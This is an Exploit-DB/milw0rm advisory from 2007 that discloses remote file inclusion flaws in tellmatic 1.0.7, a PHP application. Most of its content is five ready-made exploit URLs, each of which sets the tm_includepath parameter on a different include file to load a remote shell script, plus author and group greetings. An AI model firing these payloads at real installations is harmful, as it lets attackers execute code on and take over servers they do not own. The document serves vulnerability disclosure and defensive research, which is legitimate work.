tellmatic 1.0.7 - Multiple Remote File Inclusions

EDB-ID:

4684




Platform:

PHP

Date:

2007-12-01


~~~~~~~~~~~~~~~~~~~~~~
~ tellmatic 1.0.7 RFI ~
~~~~~~~~~~~~~~~~~~~~~~

---------------------
Author              : ShAy6oOoN
---------------------
Group               : PitBull Crew
---------------------
Script              : tellmatic 1.0.7
---------------------
Download            : http://downloads.sourceforge.net/tellmatic/tellmatic-1.0.7.tgz?modtime=1196381865&big_mirror=0
---------------------
Vulnerability Type  : Remote File Inclusion
---------------------
Method              : get
---------------------
Register_globals    : On
---------------------
Exploit URL's       :
---------------------

http://localhost/tellmatic/include/Classes.inc.php?tm_includepath=http://localhost/shell.txt?

http://localhost/tellmatic/include/statistic.inc.php?tm_includepath=http://localhost/shell.txt?

http://localhost/tellmatic/include/status.inc.php?tm_includepath=http://localhost/shell.txt?

http://localhost/tellmatic/include/status_top_x.inc.php?tm_includepath=http://localhost/shell.txt?

http://localhost/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://localhost/shell.txt?


Greetings:
----------

PitBull Crew : The_PitBull - iNs - c0ol - Raz0r


Thanks To:
----------

str0ke

# milw0rm.com [2007-12-01]